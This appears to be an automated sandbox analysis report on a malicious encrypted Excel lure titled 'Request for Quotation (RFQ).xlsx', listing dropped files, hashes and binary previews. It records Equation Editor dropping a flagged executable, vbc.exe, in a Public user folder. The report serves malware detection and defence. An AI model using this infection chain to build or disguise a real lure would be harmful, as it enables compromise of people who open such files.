                                                                                      Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6A8387D5.emf
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                      Category:dropped
                                                                                      Size (bytes):653280
                                                                                      Entropy (8bit):2.898661978170601
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:J34UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyQu50yknG/qc+5:h4UcLe0JOqQQZR8MDdATCR3tSqjqcS
                                                                                      MD5:67445CD831AFBE3C8305D57A9F637F06
                                                                                      SHA1:085ED026956D0E62B61DA7E9708EDF25ABEF691B
                                                                                      SHA-256:EEBC575A5135E7C0D93E102F85D20998917E4B5D7485F0AB335E6DAAA55C1C37
                                                                                      SHA-512:CC90BFDA92EF583C65D5CFDB389635B5539945BA51E27AB3F3257F58B5AAD490B6733784FAFC53B8851BAC03B0DCC54797A3722D6E66328F7B1E86590C845C15
                                                                                      Malicious:false
                                                                                      Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................S$......-z.S.@..%.............8......N.T8..0.............N.T8..0.. ....y.S0..8.. .........2..z.S........................................%...X...%...7...................{$..................C.a.l.i.b.r.i..............X...0..d........2...gvdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F569DAB.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):84203
                                                                                      Entropy (8bit):7.979766688932294
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                                                                      MD5:208FD40D2F72D9AED77A86A44782E9E2
                                                                                      SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                                                                      SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                                                                      SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                                                                      Malicious:false
                                                                                      Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7B58EFF1.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):8815
                                                                                      Entropy (8bit):7.944898651451431
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                                                      MD5:F06432656347B7042C803FE58F4043E1
                                                                                      SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                                                      SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                                                      SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                                                      Malicious:false
                                                                                      Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\862DD3FC.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):84203
                                                                                      Entropy (8bit):7.979766688932294
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                                                                      MD5:208FD40D2F72D9AED77A86A44782E9E2
                                                                                      SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                                                                      SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                                                                      SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                                                                      Malicious:false
                                                                                      Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\87C26827.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):49744
                                                                                      Entropy (8bit):7.99056926749243
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                                                                      MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                                                                      SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                                                                      SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                                                                      SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                                                                      Malicious:false
                                                                                      Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8FEB23B0.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):50311
                                                                                      Entropy (8bit):7.960958863022709
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                                                                                      MD5:4141C7515CE64FED13BE6D2BA33299AA
                                                                                      SHA1:B290F533537A734B7030CE1269AC8C5398754194
                                                                                      SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                                                                                      SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                                                                                      Malicious:false
                                                                                      Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B121FC63.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):48770
                                                                                      Entropy (8bit):7.801842363879827
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                      MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                      SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                      SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                      SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                      Malicious:false
                                                                                      Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C6662BCD.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):50311
                                                                                      Entropy (8bit):7.960958863022709
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                                                                                      MD5:4141C7515CE64FED13BE6D2BA33299AA
                                                                                      SHA1:B290F533537A734B7030CE1269AC8C5398754194
                                                                                      SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                                                                                      SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                                                                                      Malicious:false
                                                                                      Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FA8E76A.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):8815
                                                                                      Entropy (8bit):7.944898651451431
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                                                      MD5:F06432656347B7042C803FE58F4043E1
                                                                                      SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                                                      SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                                                      SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                                                      Malicious:false
                                                                                      Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                                                      C:\Users\user\AppData\Local\Temp\Cab71DC.tmp
                                                                                      Process:C:\Users\Public\vbc.exe
                                                                                      File Type:Microsoft Cabinet archive data, 60080 bytes, 1 file
                                                                                      Category:dropped
                                                                                      Size (bytes):60080
                                                                                      Entropy (8bit):7.995256720209506
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:O78wIEbt8Rc7GHyP7zpxeiB9jTs6cX8ENclXVbFYYDceSKZyhRhbzfgtEnz9BPNZ:A8Rc7GHyhUHsVNPOlhbz2E5BPNiUu+g4
                                                                                      MD5:6045BACCF49E1EBA0E674945311A06E6
                                                                                      SHA1:379C6234849EECEDE26FAD192C2EE59E0F0221CB
                                                                                      SHA-256:65830A65CB913BEE83258E4AC3E140FAF131E7EB084D39F7020C7ACC825B0A58
                                                                                      SHA-512:DA32AF6A730884E73956E4EB6BFF61A1326B3EF8BA0A213B5B4AAD6DE4FBD471B3550B6AC2110F1D0B2091E33C70D44E498F897376F8E1998B1D2AFAC789ABEB
                                                                                      Malicious:false
                                                                                      Preview: MSCF............,...................I........d.........R9b .authroot.stl.3..).4..CK..8T....c_.d....A.K...].M$[v.4.)7-.%.QIR..$t)Kd.-[..T\{..ne.....{..<.......Ab.<..X....sb.....e........dbu.3...0........X..00&Z....C...p0.}..2..0m.}..Cj.9U..J.j.Y...#.L..\X..O.,...,.qu..]..(B.nE~Q...)..Gcx.....}...f....zw.a..9+[.<0.'..2 .s..ya..J......wd....OO!.s....`.WA...F6._f....6...g..2..7.$,....X.k..&...E...g.....>uv."..!......xc......C..?....P0$.Y..?u....Z0.g3.>W0&.y.(....].`>... ..R.q..wg*X......qB!.B....Z.4..>.R.M..0.8...=.8..Ya.s.......add..)..w.4.&.z...2.&74.5]..w.j.._iK..||[.w.M.!<-.}%.C<tDX5\s._..I..*..nb.....GCQ.V..r..Y.............q...0..V)Tu>.Z..r...I...<.R{Ac..x^. .<A........|.{.....Q...&....X..C$....e9.:..vI..x.R4...L......%g...<..}'{....E8Sl...E".h...*.........ItVs.K......3.9.l..`D..e.i`....y...,..5....aSs`..W...d...t.J..]....'u3..d]7..=e....[R!:........Q.%..@........ga.v.~..q....{.!N.b]x..Zx.../;#}.f.)k.c9..{rmPt..z5.m=..q..%.D#<+Ex....1|.._F.
                                                                                      C:\Users\user\AppData\Local\Temp\Tar71DD.tmp
                                                                                      Process:C:\Users\Public\vbc.exe
                                                                                      File Type:data
                                                                                      Category:modified
                                                                                      Size (bytes):156885
                                                                                      Entropy (8bit):6.30972017530066
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:NlR6c79JjgCyrYBWsWimp4Ydm6Caku2SWsz0OD8reJgMnl3XlMuGmO:N2UJcCyZfdmoku2SL3kMnBGuzO
                                                                                      MD5:9BE376D85B319264740EF583F548B72A
                                                                                      SHA1:6C6416CBC51AAC89A21A529695A8FCD3AD5E6B85
                                                                                      SHA-256:07FDF8BC502E6BB4CF6AE214694F45C54A53228FC2002B2F17C9A2EF64EB76F6
                                                                                      SHA-512:8AFC5D0D046E8B410EC1D29E2E16FB00CD92F8822D678AA0EE2A57098E05F2A0E165858347F035AE593B62BF195802CB6F9A5F92670041E1828669987CEEC7DE
                                                                                      Malicious:false
                                                                                      Preview: 0..d...*.H.........d.0..d....1.0...`.H.e......0..T...+.....7.....T.0..T.0...+.....7........L.E*u...210519191503Z0...+......0..T.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                      C:\Users\user\Desktop\~$Request for Quotation (RFQ).xlsx
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):330
                                                                                      Entropy (8bit):1.4377382811115937
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                      MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                      SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                      SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                      SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                      Malicious:true
                                                                                      Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                      C:\Users\Public\vbc.exe
                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):860672
                                                                                      Entropy (8bit):7.64738851637245
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:lzlgfvquwaHp/S4RxwD4jvcQ8MfHVQViTa7zfl+D6YtW0E:llaquPHpK4R2cj1eVbHfl30
                                                                                      MD5:E123306FCC7FD3C3BDA8993B4F6C43A2
                                                                                      SHA1:B9247EC8B7158C490369961D0E5ABEE45C305C9D
                                                                                      SHA-256:AAB5F4C72AFC1C8F1BEACB75EB3FA27DFD18E6D1E58E6A0C9F28222550C30AF7
                                                                                      SHA-512:DFD7602656D7E5B3B31360D7A200457502867EEC2ED673288DA882136051A6D1376B2741354B807989E5A298BBB370C54D71573DA82A51C55DC639EBF5B256BB
                                                                                      Malicious:true
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`c.`.....................F......N.... ........@.. ....................................@.....................................K........B...................`....................................................... ............... ..H............text...T.... ...................... ..`.rsrc....B.......D..................@..@.reloc.......`....... ..............@..B................0.......H........'..H...........H,..k...........................................j+.&.(....(....(.....o....*..0..........+.&.+.&. ....8E.....(.... ....(....:/...8*.....(.... ....8......(....82... ............E....................1...........H...8,...& ....8......(....(....(....9....& ....8......(.... ....(....:....&*...V+.&..(....(....(....*..V+.&..(....(....(....*...+.&..*..+.&..*.J+.&.........(....*.J+.&.........(....*.J+.&.........(....*.J+.&.........(....*..+.&..(....*:+.&.....o .

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:CDFV2 Encrypted
                                                                                      Entropy (8bit):7.995369439385782
                                                                                      TrID:
                                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                      File name:Request for Quotation (RFQ).xlsx
                                                                                      File size:1262080
                                                                                      MD5:84c78e6de4ef5f0c45f463953f7974ec
                                                                                      SHA1:3018a8907c25585afb95d899d7e02414c57f87f5
                                                                                      SHA256:2cea67f41e7e4bc7a0d6a29cc9d5ad722e976f51546941abe407a0a9db61e5d9
                                                                                      SHA512:eed5d4ec8b92e106c1ae475eae538c308660ac7b0150cbe684084309d9c41eebaa72fe9aab46960f18df7692782de2066b5a406b85589ead7dac63d7ea8f24e3
                                                                                      SSDEEP:24576:rmDlTBR+TU2peSjqH7q5WK9jSNf1jZc1MrA03PzX2ZE9ufOlv3bDVt82j86vR:SDAvwq5W1a2PD2erV3bDVtvjf
                                                                                      File Content Preview:........................>...............................................................................................z.......|.......~...............z......................................................................................................

                                                                                      File Icon

                                                                                      Icon Hash:e4e2aa8aa4b4bcb4

                                                                                      Static OLE Info

                                                                                      General

                                                                                      Document Type:OLE
                                                                                      Number of OLE Files:1

                                                                                      OLE File "Request for Quotation (RFQ).xlsx"

                                                                                      Indicators

                                                                                      Has Summary Info:False
                                                                                      Application Name:unknown
                                                                                      Encrypted Document:True
                                                                                      Contains Word Document Stream:False
                                                                                      Contains Workbook/Book Stream:False
                                                                                      Contains PowerPoint Document Stream:False
                                                                                      Contains Visio Document Stream:False
                                                                                      Contains ObjectPool Stream:
                                                                                      Flash Objects Count:
                                                                                      Contains VBA Macros:False

                                                                                      Streams

                                                                                      Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                      General
                                                                                      Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                      File Type:data
                                                                                      Stream Size:64
                                                                                      Entropy:2.73637206947
                                                                                      Base64 Encoded:False
                                                                                      Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
